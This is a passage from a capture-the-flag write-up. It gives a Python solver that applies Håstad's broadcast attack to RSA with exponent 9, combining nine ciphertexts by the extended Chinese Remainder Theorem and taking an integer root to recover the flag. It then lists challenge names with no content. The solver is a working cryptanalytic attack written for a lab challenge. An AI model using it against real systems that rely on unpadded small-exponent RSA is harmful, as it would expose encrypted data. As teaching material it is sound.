16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515]

exp

import gmpy2
import math
from Crypto.Util.number import *
def merge(a1,n1,a2,n2):
    d = math.gcd(n1,n2)
    c = a2-a1
    if c%d!=0:
        return 0
    c = (c%n2+n2)%n2
    c = c//d
    n1 = n1//d
    n2 = n2//d
    c *= gmpy2.invert(n1,n2)
    c %= n2
    c *= n1*d
    c += a1
    global n3
    global a3
    n3 = n1*n2*d
    a3 = (c%n3+n3)%n3
    return 1
def exCRT(a,n):
    a1=a[0]
    n1=n[0]
    le= len(a)
    for i in range(1,le):
        a2 = a[i]
        n2=n[i]
        if not merge(a1,n1,a2,n2):
            return -1
        a1 = a3
        n1 = n3
    global mod
    mod=n1
    return (a1%n1+n1)%n1
def exCRT_getequation(a,n):
    a1=a[0]
    n1=n[0]
    le= len(a)
    for i in range(1,le):
        a2 = a[i]
        n2=n[i]
        if not merge(a1,n1,a2,n2):
            return -1
        a1 = a3
        n1 = n3
    return (a1,n1)

n = [71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 
72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581]
c = [62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 
16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515]
m9=exCRT(c,n)
m=gmpy2.iroot(m9,9)[0]
print(long_to_bytes(m))
#flag{H0w_Fun_13_HAstads_broadca5t_AtTack!}

mobile

AreYouRich

designEachStep


rev

petition

Locke

pwn

littleof

babyof

onecho

easycho

pwn1